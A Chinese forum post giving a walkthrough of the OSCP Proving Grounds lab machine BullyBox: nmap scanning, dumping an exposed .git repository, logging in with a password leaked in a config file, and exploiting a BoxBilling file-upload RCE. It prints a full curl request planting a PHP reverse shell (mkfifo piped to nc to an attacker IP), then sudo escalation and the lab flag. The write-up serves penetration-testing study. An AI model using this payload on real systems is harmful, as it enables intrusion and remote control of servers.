OSCP - Proving Grounds - BullyBox

圆咕噜咕噜  论坛元老 | 2025-1-20 23:25:58 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 1044|帖子 1044|积分 3132

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
重要知识点



  • 如果发现有域名,则可以到场/etc/hosts后重新执行nmap,nikto等扫描
  • dirsearch的时候可以使用完整一些的字典文件,制止漏掉信息
  • .git dump
详细步调

执行nmap 扫描,发现 80和22端口开放,访问后发现被重定向到 bullybox.local
  1. Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 12:20 UTC
  2. Nmap scan report for 192.168.59.27
  3. Host is up (0.00072s latency).
  4. Not shown: 65533 closed tcp ports (reset)
  5. PORT   STATE SERVICE VERSION
  6. 22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
  7. | ssh-hostkey:
  8. |   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
  9. |_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
  10. 80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
  11. |_http-title: Site doesn't have a title (text/html).
  12. |_http-server-header: Apache/2.4.52 (Ubuntu)
复制代码
实行修改/etc/hosts,将ip与bullybox.local绑定,之后重新执行nmap扫描,得到了更多的信息,好比.git路径,以及robots.txt中的entries
  1. Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 17:50 EDT
  2. Nmap scan report for bullybox.local (192.168.174.27)
  3. Host is up (0.44s latency).
  4. Not shown: 65533 closed tcp ports (reset)
  5. PORT   STATE SERVICE VERSION
  6. 22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
  7. | ssh-hostkey:
  8. |   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
  9. |_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
  10. 80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
  11. | http-robots.txt: 8 disallowed entries
  12. | /boxbilling/bb-data/ /bb-data/ /bb-library/
  13. |_/bb-locale/ /bb-modules/ /bb-uploads/ /bb-vendor/ /install/
  14. |_http-server-header: Apache/2.4.52 (Ubuntu)
  15. |_http-title: Client Area
  16. | http-git:
  17. |   192.168.174.27:80/.git/
  18. |     Git repository found!
  19. |     Repository description: Unnamed repository; edit this file 'description' to name the...
  20. |_    Last commit message: Ready For launch
  21. No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
复制代码
访问robots.txt中的路径,得到疑似admin用户名

使用搜索引擎寻找 可以dump .git的应用,得到GitHub - arthaud/git-dumper: A tool to dump a git repository from a website,实行运行后,乐成dump git代码库,如果配置了署理,记得调用unset http_proxy,否则会报502错误
  1. C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
  2. /home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
  3.   modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
  4. [-] Testing http://bullybox.local/.git/HEAD [502]
  5. [-] http://bullybox.local//.git/HEAD responded with status code 502
  6.                                                                                                                                                                                                                                             
  7. C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> unset http_proxy                                                                                          
  8.                                                                                                                                                                                                                                             
  9. C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
  10. /home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
  11.   modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
  12. [-] Testing http://bullybox.local/.git/HEAD [200]
  13. [-] Testing http://bullybox.local/.git/ [403]
  14. [-] Fetching common files
  15. [-] Fetching http://bullybox.local/.git/hooks/post-update.sample [200]
  16. [-] Fetching http://bullybox.local/.git/hooks/pre-commit.sample [200]
  17. [-] Fetching http://bullybox.local/.git/hooks/post-commit.sample [404]
  18. [-] http://bullybox.local/.git/hooks/post-commit.sample responded with status code 404
  19. [-] Fetching http://bullybox.local/.git/hooks/pre-applypatch.sample [200]
  20. [-] Fetching http://bullybox.local/.git/description [200]
  21. [-] Fetching http://bullybox.local/.gitignore [404]
  22. [-] http://bullybox.local/.gitignore responded with status code 404
  23. [-] Fetching http://bullybox.local/.git/hooks/post-receive.sample [404]
  24. [-] http://bullybox.local/.git/hooks/post-receive.sample responded with status code 404
  25. [-] Fetching http://bullybox.local/.git/hooks/applypatch-msg.sample [200]
  26. [-] Fetching http://bullybox.local/.git/COMMIT_EDITMSG [200]
  27. [-] Fetching http://bullybox.local/.git/hooks/pre-rebase.sample [200]
  28. [-] Fetching http://bullybox.local/.git/hooks/commit-msg.sample [200]
  29. [-] Fetching http://bullybox.local/.git/hooks/pre-push.sample [200]
  30. [-] Fetching http://bullybox.local/.git/hooks/prepare-commit-msg.sample [200]
  31. [-] Fetching http://bullybox.local/.git/index [200]
  32. [-] Fetching http://bullybox.local/.git/objects/info/packs [404]
  33. [-] http://bullybox.local/.git/objects/info/packs responded with status code 404
  34. [-] Fetching http://bullybox.local/.git/hooks/pre-receive.sample [200]
复制代码
执行cat /bb-config.php,发现疑似密码,结合已经发现的用户名admin@bullybox.local,登录乐成
  1. array (
  2.     'type' => 'mysql',
  3.     'host' => 'localhost',
  4.     'name' => 'boxbilling',
  5.     'user' => 'admin',
  6.     'password' => 'Playing-Unstylish7-Provided',
  7.   ),
复制代码


发现
版本为4.22.1.5,搜索一下发现有文件上传漏洞BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) - PHP webapps Exploit,实行使用一下
先使用firefox得到Cookie中生存的phpsessionid,并在本地启用nc -nlvp之后调用如下下令,我是用Postman调用的,会生成下面的curl下令
  1. curl --location 'http://bullybox.local/index.php?_url=%2Fapi%2Fadmin%2FFilemanager%2Fsave_file' \
  2. --header 'Cookie: PHPSESSID=tjlfj0mpf85cjgh8g0rjtc0jnn \
  3. --header 'Content-Type: application/x-www-form-urlencoded' \
  4. --data-urlencode 'order_id=1' \
  5. --data-urlencode 'path=reverse.php' \
  6. --data-urlencode 'data=<?php shell_exec('\''rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.209 80>/tmp/f'\''); ?>'
复制代码

得到反弹shell,而且具备SUDO权限,可以直接拿到flag
  1. C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox> nc -nlvp 80  
  2. listening on [any] 80 ...
  3. connect to [192.168.45.209] from (UNKNOWN) [192.168.226.27] 57090
  4. bash: cannot set terminal process group (1311): Inappropriate ioctl for device
  5. bash: no job control in this shell
  6. To run a command as administrator (user "root"), use "sudo <command>".
  7. See "man sudo_root" for details.
  9. yuki@bullybox:/var/www/bullybox$ id
  10. id
  11. uid=1001(yuki) gid=1001(yuki) groups=1001(yuki),27(sudo)
  12. yuki@bullybox:/var/www/bullybox$ sudo -l
  13. sudo -l
  14. Matching Defaults entries for yuki on bullybox:
  15.     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
  17. User yuki may run the following commands on bullybox:
  18.     (ALL : ALL) ALL
  19.     (ALL) NOPASSWD: ALL
  20. yuki@bullybox:/var/www/bullybox$ sudo cat /root/proof.txt
  21. sudo cat /root/proof.txt
  22. 2cf1d3dd8eab874dd006dad9912c1388
  23. yuki@bullybox:/var/www/bullybox$
复制代码



免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

圆咕噜咕噜

论坛元老
这个人很懒什么都没写!

楼主热帖

标签云

AI 运维 CIO 存储 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表